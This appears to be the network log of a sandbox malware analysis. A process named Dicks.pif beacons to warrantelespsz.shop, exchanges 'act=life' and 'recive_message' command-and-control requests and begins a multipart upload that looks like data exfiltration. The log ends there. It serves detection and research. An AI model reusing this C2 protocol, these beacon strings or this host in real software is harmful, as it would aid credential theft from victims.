Jul 25, 2024 09:54:11.557034016 CEST	443	49726	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:11.557084084 CEST	49726	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:11.559201002 CEST	49726	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:11.559221983 CEST	443	49726	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:12.016990900 CEST	49727	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:12.017026901 CEST	443	49727	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:12.017111063 CEST	49727	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:12.017424107 CEST	49727	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:12.017440081 CEST	443	49727	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:12.517630100 CEST	443	49727	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:12.517765045 CEST	49727	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:12.519117117 CEST	49727	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:12.519124985 CEST	443	49727	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:12.519367933 CEST	443	49727	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:12.520792007 CEST	49727	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:12.520792007 CEST	49727	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:12.520822048 CEST	443	49727	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:12.908871889 CEST	443	49727	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:12.909004927 CEST	443	49727	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:12.909080029 CEST	49727	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:12.909183979 CEST	49727	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:12.909203053 CEST	443	49727	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:13.402586937 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.402631998 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:13.402699947 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.403017044 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.403031111 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:13.980176926 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:13.980249882 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.987615108 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.987633944 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:13.987910032 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:13.992697001 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.993525982 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.993607998 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:13.993715048 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.993772984 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:13.993863106 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.993956089 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:13.995625973 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.995686054 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:13.995817900 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.995855093 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:13.997088909 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.997122049 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:13.997133970 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.997468948 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:13.997509003 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:14.011697054 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:14.012449026 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:14.012486935 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:14.012506962 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:14.012526035 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:14.012638092 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:14.012672901 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:14.015131950 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:14.015609026 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:14.015640020 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:15.433077097 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:15.433341026 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:15.433417082 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:15.433486938 CEST	49728	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:15.433507919 CEST	443	49728	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:15.479137897 CEST	49729	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:15.479186058 CEST	443	49729	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:15.479260921 CEST	49729	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:15.479578018 CEST	49729	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:15.479595900 CEST	443	49729	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:17.088196039 CEST	443	49729	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:17.088274002 CEST	49729	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:17.090003014 CEST	49729	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:17.090015888 CEST	443	49729	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:17.090269089 CEST	443	49729	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:17.091931105 CEST	49729	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:17.091964960 CEST	49729	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:17.092015982 CEST	443	49729	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:18.413511038 CEST	443	49729	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:18.413635015 CEST	443	49729	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:18.413717031 CEST	49729	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:18.413966894 CEST	49729	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:18.413980961 CEST	443	49729	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:18.414011955 CEST	49729	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:18.414017916 CEST	443	49729	188.114.96.3	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 09:53:07.666429996 CEST	57273	53	192.168.2.6	1.1.1.1
Jul 25, 2024 09:53:07.810509920 CEST	53	57273	1.1.1.1	192.168.2.6
Jul 25, 2024 09:54:05.127075911 CEST	53743	53	192.168.2.6	1.1.1.1
Jul 25, 2024 09:54:05.140547991 CEST	53	53743	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 09:53:07.666429996 CEST	192.168.2.6	1.1.1.1	0xe554	Standard query (0)	fDwYocEDWIyxswuSuKqfrffGAPh.fDwYocEDWIyxswuSuKqfrffGAPh	A (IP address)	IN (0x0001)	false
Jul 25, 2024 09:54:05.127075911 CEST	192.168.2.6	1.1.1.1	0x4e9b	Standard query (0)	warrantelespsz.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 09:53:07.810509920 CEST	1.1.1.1	192.168.2.6	0xe554	Name error (3)	fDwYocEDWIyxswuSuKqfrffGAPh.fDwYocEDWIyxswuSuKqfrffGAPh	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 09:54:05.140547991 CEST	1.1.1.1	192.168.2.6	0x4e9b	No error (0)	warrantelespsz.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 25, 2024 09:54:05.140547991 CEST	1.1.1.1	192.168.2.6	0x4e9b	No error (0)	warrantelespsz.shop		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

warrantelespsz.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49722	188.114.96.3	443	3248	C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-25 07:54:05 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: warrantelespsz.shop
2024-07-25 07:54:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-25 07:54:06 UTC	802	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 07:54:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gao4lftnno5n4t3jionpio85do; expires=Mon, 18-Nov-2024 01:40:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vPgP7KsTbLd%2Fmn7SbU4Iwc4WJPx6mqpPFouXH%2F4CmXLOIOBv%2BgiENfDGHpxgyiksbyuEOvpM53bqYBmfRxRg9lCWNqtuR8gRZc5a6JblvO%2FBojeQc7705ClaYijNKjWQ2c7PdTJb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8a947b89bac327-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 07:54:06 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-25 07:54:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49723	188.114.96.3	443	3248	C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-25 07:54:06 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: warrantelespsz.shop
2024-07-25 07:54:06 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 6c 67 59 39 69 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=DlgY9i--&j=
2024-07-25 07:54:07 UTC	796	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 07:54:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uejicjiufr9qjmair0fu3n00n7; expires=Mon, 18-Nov-2024 01:40:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U5ny83157LDcfmIayucpbXpH4B8Z6b9HjjETP5RGUIy1QHhWM8hnhLvlEeLQkvT9DIXYuihKvhvASfV9m6mhjTqkjwVFeiZmdRRAwSoO%2F1tEsAqsBUOhmG6fQQfHw8gMEuY8bMiQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8a9481197a424c-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 07:54:07 UTC	573	IN	Data Raw: 34 32 32 30 0d 0a 6b 31 6d 68 6e 6c 31 39 47 41 43 47 69 2b 43 49 66 69 62 31 69 4a 53 37 59 56 64 43 6b 37 6a 63 45 57 49 51 73 4a 4d 77 36 46 72 6f 65 39 65 38 5a 30 6b 30 49 76 58 75 77 72 49 4b 56 49 44 74 75 4a 6b 41 4d 32 43 70 33 72 31 39 45 58 57 63 73 55 61 46 65 4b 6b 2f 77 50 49 75 47 44 51 69 34 2f 50 43 73 69 56 64 31 2b 33 36 6d 56 74 31 4a 2f 6e 61 76 58 30 41 63 64 76 38 51 49 51 35 2b 7a 58 47 39 6a 67 65 66 47 48 71 35 6f 58 74 47 30 65 66 35 76 33 57 43 54 70 67 76 35 71 35 61 30 41 71 6b 74 35 56 6e 44 76 65 4f 4e 4c 31 66 77 41 30 65 36 54 75 6a 71 70 45 42 4a 54 74 39 74 63 48 4d 79 6e 37 30 4c 52 31 41 58 54 61 34 31 6d 4f 4d 76 73 37 78 66 63 79 46 32 68 73 34 4f 47 4f 36 78 46 48 31 36 53 32 33 68 74 31 65 4c 47 4a 6a 48 41 52 59 Data Ascii: 4220k1mhnl19GACGi+CIfib1iJS7YVdCk7jcEWIQsJMw6Froe9e8Z0k0IvXuwrIKVIDtuJkAM2Cp3r19EXWcsUaFeKk/wPIuGDQi4/PCsiVd1+36mVt1J/navX0Acdv8QIQ5+zXG9jgefGHq5oXtG0ef5v3WCTpgv5q5a0Aqkt5VnDveONL1fwA0e6TujqpEBJTt9tcHMyn70LR1AXTa41mOMvs7xfcyF2hs4OGO6xFH16S23ht1eLGJjHARY
2024-07-25 07:54:07 UTC	1369	IN	Data Raw: 32 7a 50 4e 63 51 35 75 71 72 70 6b 4e 4d 43 2f 6a 32 36 78 32 44 6d 44 65 39 46 53 48 4f 2f 38 37 78 76 73 79 45 58 78 6c 35 2b 47 47 36 78 4a 49 6e 65 6e 79 32 6b 4e 37 59 50 62 43 2f 69 74 41 51 39 48 31 56 5a 67 37 2f 33 76 63 73 69 5a 66 66 57 36 6b 73 63 4c 67 47 6b 6d 65 34 66 48 52 44 79 63 72 2f 74 6d 33 64 41 5a 34 30 66 6c 59 6a 44 62 77 50 4d 62 37 4c 52 46 78 62 2b 66 6a 68 4b 70 53 42 4a 44 79 74 6f 46 44 47 79 50 67 7a 49 78 77 45 57 4f 53 37 68 79 54 65 50 59 33 67 36 52 2f 46 6e 4a 74 36 65 53 49 35 42 6c 4a 6e 75 76 33 31 41 55 2b 49 66 6e 53 75 6e 51 41 64 74 2f 2b 58 49 6f 32 2b 54 37 48 39 6a 5a 66 4e 43 4c 6a 38 63 4b 79 58 48 53 61 35 76 33 56 51 51 41 6a 2f 39 53 35 5a 55 42 74 6e 4f 67 53 6a 54 53 78 59 34 50 75 4e 42 4a 37 62 50 Data Ascii: 2zPNcQ5uqrpkNMC/j26x2DmDe9FSHO/87xvsyEXxl5+GG6xJIneny2kN7YPbC/itAQ9H1VZg7/3vcsiZffW6kscLgGkme4fHRDycr/tm3dAZ40flYjDbwPMb7LRFxb+fjhKpSBJDytoFDGyPgzIxwEWOS7hyTePY3g6R/FnJt6eSI5BlJnuv31AU+IfnSunQAdt/+XIo2+T7H9jZfNCLj8cKyXHSa5v3VQQAj/9S5ZUBtnOgSjTSxY4PuNBJ7bP
2024-07-25 07:54:07 UTC	1369	IN	Data Raw: 58 45 4f 50 71 71 36 5a 4e 53 55 74 2f 66 53 31 66 77 6b 79 7a 62 39 4c 79 6a 2f 39 65 35 75 38 4f 78 4e 79 61 4f 76 67 69 4f 41 54 54 5a 66 69 2f 39 41 41 4e 53 7a 33 32 37 4a 2f 44 58 66 52 39 46 2b 50 4f 50 30 38 78 50 31 2f 55 54 70 6c 2f 4b 6e 61 71 69 78 4a 6d 2b 48 36 6d 7a 59 32 4c 76 2f 64 71 44 4d 66 50 4d 75 78 56 59 5a 34 71 58 76 4d 2f 54 49 56 63 57 7a 6f 36 49 4c 75 48 30 36 58 35 66 50 66 43 7a 77 67 34 39 32 78 63 67 46 35 32 66 78 63 6a 7a 6e 30 50 49 4f 79 66 78 68 69 49 72 79 70 72 38 4d 6d 42 49 69 6b 37 35 6b 45 4f 57 43 70 6d 72 70 35 41 48 2f 59 2b 6c 32 4a 50 2f 38 37 7a 76 59 74 46 33 70 69 36 75 2b 44 35 68 6c 46 6d 2b 6e 6b 31 51 55 34 4a 76 6e 49 2f 6a 31 41 64 63 71 78 43 73 6f 59 2b 6a 66 41 38 44 34 59 4f 45 50 75 36 6f 6e Data Ascii: XEOPqq6ZNSUt/fS1fwkyzb9Lyj/9e5u8OxNyaOvgiOATTZfi/9AANSz327J/DXfR9F+POP08xP1/UTpl/KnaqixJm+H6mzY2Lv/dqDMfPMuxVYZ4qXvM/TIVcWzo6ILuH06X5fPfCzwg492xcgF52fxcjzn0PIOyfxhiIrypr8MmBIik75kEOWCpmrp5AH/Y+l2JP/87zvYtF3pi6u+D5hlFm+nk1QU4JvnI/j1AdcqxCsoY+jfA8D4YOEPu6on
2024-07-25 07:54:07 UTC	1369	IN	Data Raw: 2b 54 78 31 77 38 37 4c 66 76 5a 73 7a 4e 4f 4d 74 58 70 45 74 4a 34 33 54 7a 4f 30 6a 51 54 66 53 4c 37 70 35 75 71 47 30 6a 58 73 72 62 56 43 54 6b 70 38 64 4f 37 65 77 74 37 31 2f 42 5a 6a 7a 76 33 4e 73 7a 31 4c 52 56 35 62 4f 66 6c 6a 75 77 64 52 34 58 69 2f 35 6c 4e 64 53 66 70 6d 75 59 7a 49 58 7a 66 35 56 57 61 65 4f 35 31 32 72 77 34 45 7a 6f 36 70 4f 71 44 35 52 39 46 6d 75 7a 2f 30 51 4d 7a 4a 66 37 58 73 48 51 48 63 74 2f 2f 58 59 77 77 2f 44 66 49 38 6a 59 5a 65 6d 50 75 71 63 79 71 47 31 7a 58 73 72 62 70 41 44 55 67 36 70 71 68 50 52 6b 79 31 66 30 53 30 6e 6a 6a 4d 63 72 38 50 42 42 39 5a 75 2f 6c 68 2b 38 54 52 35 37 76 2f 39 63 52 50 43 37 35 30 72 46 32 43 33 4c 66 2b 31 36 4b 4f 37 46 31 67 2f 73 6e 58 79 49 69 31 75 53 4f 2f 42 74 4c Data Ascii: +Tx1w87LfvZszNOMtXpEtJ43TzO0jQTfSL7p5uqG0jXsrbVCTkp8dO7ewt71/BZjzv3Nsz1LRV5bOfljuwdR4Xi/5lNdSfpmuYzIXzf5VWaeO512rw4Ezo6pOqD5R9Fmuz/0QMzJf7XsHQHct//XYww/DfI8jYZemPuqcyqG1zXsrbpADUg6pqhPRky1f0S0njjMcr8PBB9Zu/lh+8TR57v/9cRPC750rF2C3Lf+16KO7F1g/snXyIi1uSO/BtL
2024-07-25 07:54:07 UTC	1369	IN	Data Raw: 6f 4b 4d 69 6a 39 30 4c 31 30 51 44 79 53 39 6b 72 4b 59 4c 45 59 31 4f 77 79 58 32 55 73 2f 61 6d 46 35 6c 77 63 31 2b 4c 37 30 51 6b 78 4a 2f 7a 64 75 48 6f 53 65 39 66 2f 55 6f 34 7a 2f 6a 33 48 2f 7a 38 4e 66 47 62 73 36 6f 2f 6e 45 6b 65 54 71 72 69 5a 42 43 31 67 71 5a 71 4d 66 67 35 70 33 66 5a 44 67 48 6a 75 64 64 71 38 4f 42 4d 36 4f 71 54 74 6a 50 67 58 52 5a 7a 68 2b 4e 34 4d 4d 43 72 78 31 62 70 77 44 6e 6e 54 38 6c 71 48 4e 66 38 78 79 76 55 34 45 33 35 6c 70 4b 66 43 37 51 51 45 7a 36 72 64 2b 43 34 5a 4a 2b 75 61 6f 54 30 5a 4d 74 58 39 45 74 4a 34 2f 54 4c 50 39 6a 51 59 63 47 7a 74 35 34 6e 34 44 6b 65 54 36 66 2f 61 42 44 77 75 38 64 32 37 66 51 64 7a 32 66 56 59 69 54 36 78 64 59 50 37 4a 31 38 69 49 73 6a 71 67 75 63 47 42 49 69 6b 37 Data Ascii: oKMij90L10QDyS9krKYLEY1OwyX2Us/amF5lwc1+L70QkxJ/zduHoSe9f/Uo4z/j3H/z8NfGbs6o/nEkeTqriZBC1gqZqMfg5p3fZDgHjuddq8OBM6OqTtjPgXRZzh+N4MMCrx1bpwDnnT8lqHNf8xyvU4E35lpKfC7QQEz6rd+C4ZJ+uaoT0ZMtX9EtJ4/TLP9jQYcGzt54n4DkeT6f/aBDwu8d27fQdz2fVYiT6xdYP7J18iIsjqgucGBIik7
2024-07-25 07:54:07 UTC	1369	IN	Data Raw: 79 38 74 57 78 64 77 42 39 31 50 64 54 68 54 37 32 4d 73 4c 30 4f 46 38 30 49 75 50 78 77 72 4a 63 61 70 44 70 38 70 6b 63 65 7a 6d 78 33 62 49 7a 57 44 4c 53 2b 31 69 41 4e 76 45 38 30 66 6f 32 48 33 6c 77 35 2b 2b 4b 37 42 42 49 6d 75 4c 2f 32 51 59 2b 4c 66 72 58 75 48 4d 4c 63 35 4b 2f 45 6f 30 67 73 57 4f 44 7a 54 49 52 66 6d 7a 6e 2b 59 57 71 41 77 71 4f 71 76 48 56 51 32 31 67 2f 74 4f 73 64 41 56 36 32 2f 46 63 67 7a 48 32 50 38 44 39 4f 78 4e 31 61 2b 66 68 67 2b 49 54 52 35 66 68 2f 74 4d 43 4f 79 57 78 6c 50 35 30 47 44 4b 4b 73 58 32 4a 50 66 6f 36 67 64 73 35 47 48 59 69 2b 36 65 62 71 68 74 49 31 37 4b 32 32 67 63 37 4b 66 37 65 74 48 51 41 64 64 54 78 57 6f 45 31 2b 69 6e 47 38 6a 6f 65 65 6d 50 72 35 59 4c 34 47 55 71 63 35 2f 4b 5a 54 58 Data Ascii: y8tWxdwB91PdThT72MsL0OF80IuPxwrJcapDp8pkcezmx3bIzWDLS+1iANvE80fo2H3lw5++K7BBImuL/2QY+LfrXuHMLc5K/Eo0gsWODzTIRfmzn+YWqAwqOqvHVQ21g/tOsdAV62/FcgzH2P8D9OxN1a+fhg+ITR5fh/tMCOyWxlP50GDKKsX2JPfo6gds5GHYi+6ebqhtI17K22gc7Kf7etHQAddTxWoE1+inG8joeemPr5YL4GUqc5/KZTX
2024-07-25 07:54:07 UTC	1369	IN	Data Raw: 75 57 4e 43 58 4e 6e 6c 56 63 70 32 73 54 53 44 70 41 5a 66 4d 69 4c 62 70 38 4c 79 58 42 7a 58 33 2f 58 58 44 54 49 32 34 4a 65 51 64 41 5a 33 31 65 45 51 70 44 50 6c 50 49 4f 79 66 78 6b 36 4f 72 53 6e 77 75 34 4e 42 4d 2b 36 70 49 4a 57 5a 6e 65 68 69 4b 45 39 47 54 4c 45 73 51 72 59 64 72 45 70 67 36 52 2f 57 48 6c 77 39 75 2b 42 2f 42 38 44 71 64 54 31 7a 77 34 36 4b 2f 44 6b 67 46 30 4e 63 39 48 2f 45 4c 73 75 2f 43 76 41 2b 54 67 68 52 47 7a 6a 2f 59 58 6b 47 6b 54 58 70 4c 62 57 51 32 30 5a 73 5a 4c 2b 54 45 34 79 79 72 45 4b 79 67 33 79 4e 63 33 37 4b 51 34 33 51 66 4c 6b 6a 65 45 64 42 4e 6d 71 38 4a 6c 62 5a 57 36 78 33 71 38 7a 57 43 4b 41 71 67 66 5a 62 36 46 70 33 4c 49 6d 58 32 77 69 76 4c 76 4d 71 67 34 45 7a 36 71 78 31 77 34 30 49 2f 2f Data Ascii: uWNCXNnlVcp2sTSDpAZfMiLbp8LyXBzX3/XXDTI24JeQdAZ31eEQpDPlPIOyfxk6OrSnwu4NBM+6pIJWZnehiKE9GTLEsQrYdrEpg6R/WHlw9u+B/B8DqdT1zw46K/DkgF0Nc9H/ELsu/CvA+TghRGzj/YXkGkTXpLbWQ20ZsZL+TE4yyrEKyg3yNc37KQ43QfLkjeEdBNmq8JlbZW6x3q8zWCKAqgfZb6Fp3LImX2wivLvMqg4Ez6qx1w40I//
2024-07-25 07:54:07 UTC	1369	IN	Data Raw: 44 4c 74 76 78 4b 53 65 4b 6c 37 39 76 38 78 45 58 31 30 39 61 53 6c 35 42 74 46 67 66 72 37 31 53 49 32 4d 66 75 61 38 44 4d 47 4d 6f 71 6a 48 4d 6f 38 34 48 75 62 72 47 31 45 4c 7a 47 7a 75 64 44 31 55 6c 33 58 2f 4c 61 42 55 58 74 67 34 35 72 6d 4d 30 64 78 77 4f 4e 55 69 53 37 79 66 50 33 43 47 67 68 35 63 75 4c 71 76 4e 51 33 53 4a 48 74 37 4e 34 46 45 77 43 78 6c 50 35 38 51 43 72 72 73 52 72 4b 42 37 39 37 32 37 78 6e 58 30 39 68 36 75 65 46 2f 41 30 4a 73 76 33 31 79 51 55 32 59 4c 2b 61 75 44 4e 59 49 70 79 78 56 70 74 34 71 57 75 52 70 32 70 4d 4c 54 4b 32 39 73 7a 7a 58 46 4c 58 73 71 53 58 51 79 64 67 71 5a 72 35 63 42 4a 67 31 50 4a 45 69 58 2f 50 42 65 58 2f 4c 68 56 62 62 2f 54 75 76 4e 51 4a 52 35 6e 6b 38 63 38 53 64 57 36 78 31 66 34 72 Data Ascii: DLtvxKSeKl79v8xEX109aSl5BtFgfr71SI2Mfua8DMGMoqjHMo84HubrG1ELzGzudD1Ul3X/LaBUXtg45rmM0dxwONUiS7yfP3CGgh5cuLqvNQ3SJHt7N4FEwCxlP58QCrrsRrKB79727xnX09h6ueF/A0Jsv31yQU2YL+auDNYIpyxVpt4qWuRp2pMLTK29szzXFLXsqSXQydgqZr5cBJg1PJEiX/PBeX/LhVbb/TuvNQJR5nk8c8SdW6x1f4r
2024-07-25 07:54:07 UTC	1369	IN	Data Raw: 4e 67 6d 6a 50 6c 4f 4d 4c 6e 66 54 39 71 62 2f 48 34 68 66 6f 69 65 71 44 37 38 63 6c 42 45 79 50 6e 32 66 34 39 51 47 71 53 71 52 4b 74 4b 76 6f 36 38 65 77 30 43 33 6c 6a 2f 38 6d 53 35 77 6c 56 6b 50 71 32 78 6b 30 73 59 4f 65 61 35 69 42 4f 4d 73 43 78 43 73 70 2f 2f 7a 62 43 2f 7a 45 63 61 48 44 69 36 70 54 70 57 33 71 70 33 76 33 4e 41 44 73 6d 2b 75 53 41 52 42 46 31 77 72 4e 30 69 53 37 79 65 34 32 38 4a 31 38 69 49 74 44 69 6c 75 6b 53 51 70 79 71 36 5a 63 61 64 54 61 78 67 75 30 39 51 47 43 53 71 52 4c 4e 4e 76 77 36 77 50 49 38 44 57 68 6b 35 2f 2b 42 72 53 4a 36 75 4f 6e 73 7a 77 6b 34 4c 4d 2f 6b 69 57 49 48 59 70 44 58 55 5a 77 37 73 58 57 44 35 48 39 48 4f 6b 33 6e 38 35 54 67 45 55 6a 58 39 62 6a 41 51 79 4e 67 71 59 6e 77 4d 78 49 79 69 Data Ascii: NgmjPlOMLnfT9qb/H4hfoieqD78clBEyPn2f49QGqSqRKtKvo68ew0C3lj/8mS5wlVkPq2xk0sYOea5iBOMsCxCsp//zbC/zEcaHDi6pTpW3qp3v3NADsm+uSARBF1wrN0iS7ye428J18iItDilukSQpyq6ZcadTaxgu09QGCSqRLNNvw6wPI8DWhk5/+BrSJ6uOnszwk4LM/kiWIHYpDXUZw7sXWD5H9HOk3n85TgEUjX9bjAQyNgqYnwMxIyi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49724	188.114.96.3	443	3248	C:\Users\user\AppData\Local\Temp\558563\Dicks.pif

Timestamp	Bytes transferred	Direction	Data
2024-07-25 07:54:08 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12854 Host: warrantelespsz.shop
